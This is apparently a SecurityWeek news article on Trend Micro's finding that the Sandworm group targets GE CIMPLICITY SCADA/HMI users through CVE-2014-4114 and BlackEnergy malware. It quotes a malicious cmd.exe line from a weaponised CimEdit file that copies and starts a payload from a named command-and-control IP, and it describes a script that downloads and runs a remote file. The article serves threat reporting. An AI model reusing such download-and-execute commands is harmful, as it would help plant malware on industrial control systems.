Connect with us

Hi, what are you looking for?



Sandworm Team Targeted SCADA Systems: Trend Micro

Researchers at Trend Micro say the Sandworm team may have their eyes set on compromising SCADA-based systems.

Researchers at Trend Micro say the Sandworm team may have their eyes set on compromising SCADA-based systems.

SCADA (supervisory control and data acquisition) systems are used to control industrial processes. Last week, the Sandworm team was identified by researchers at iSight Partners as being at the center of attacks using CVE-2014-4114, a zero-day vulnerability in Microsoft Windows, as part of an attack campaign.

“After beginning an investigation into the affiliated malware samples and domains, we quickly came to realization that this group is very likely targeting SCADA-centric victims who are using GE Intelligent Platform’s CIMPLICITY HMI solution suite,” Trend Micro researchers Kyle Wilhoit and Jim Gogolinski explained in a blog post. “We have observed this team utilizing .cim and .bcl files as attack vectors, both of which file types are used by the CIMPLICITY software. As further proof of the malware targeting CIMPILICITY, it drops files into the CIMPLICITY installation directory using the %CIMPATH% environment variable on the victim machines.”

According to Trend Micro, the attackers were observed using emails armed with a malicious attachment that is opened by the CIMPLICITY application and attempts to exploit CVE-2014-4114 in Microsoft Windows. If the attack against the system running CIMPLICITY is successful, it attempts to download the Black Energy malware on the system. The spear-phishing emails are spoofed to appear to come from Oleh Tiahnybok, a Ukrainian politician who has been critical of Russia.  

One of the command and control servers that garnered Trend Micro’s attention was 94[.]185[.]85[.]122.

Advertisement. Scroll to continue reading.

“We pivoted off this C2, and located a file called config.bak (SHA1 hash: c931be9cd2c0bd896ebe98c9304fea9e),” the researchers explained. “This file piqued our interest right off the bat, because it is a CimEdit/CimView file. A CimEdit/CimView file is an object oriented file for GE’s Cimplicity SCADA software suite, used to administer SCADA devices.

In config.bak there are two defined events – OnOpenExecCommand and ScreenOpenDispatch. According to Trend Micro, the handler of OnOpenExecCommand is the following command line:

cmd.exe /c “copy 94[.]185[.]85[.]122publicdefault.txt “%CIMPATH%CimCMSafegs.exe” && start “WOW64” “%CIMPATH%CimCMSafegs.exe”

“It’s important to note the variable %CIMPATH% is used for the drop location of default.txt,” the researchers noted. “This is a standard variable that Cimplicity uses for its installs. The handler of ScreenOpenDispatch is the subroutine start(). The subroutine start() downloads the file from hxxp://94[.]185[.]85[.]122/newsfeed.xml, saves and executes the downloaded file using cscript.exe, deletes the file after execution, and terminates the current process.”

The researchers noted that even though they are seeing CIMPLICITY being used as an attack vector, there is no indication attackers are manipulating any actual SCADA systems or data. However, since human-to-machine interfaces [HMIs] are located in both the corporate and control networks, this attack could be used to target either network segment, or used to cross from the corporate to the control network, they wrote.

CVE-2014-4114 was patched by Microsoft this month with MS14-060.

RelatedHackers Breach White House Computer System

RelatedFireEye Links Russia to Cyber Espionage Campaign Dating Back to 2007

Written By

Marketing professional with a background in journalism and a focus on IT security.

Click to comment


Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Gain valuable insights from industry professionals who will help guide you through the intricacies of industrial cybersecurity.


Join us for an in depth exploration of the critical nature of software and vendor supply chain security issues with a focus on understanding how attacks against identity infrastructure come with major cascading effects.


Expert Insights

Related Content


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...


The overall effect of current global geopolitical conditions is that nation states have a greater incentive to target the ICS/OT of critical industries, while...

CISO Strategy

Cybersecurity-related risk is a top concern, so boards need to know they have the proper oversight in place. Even as first-timers, successful CISOs make...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.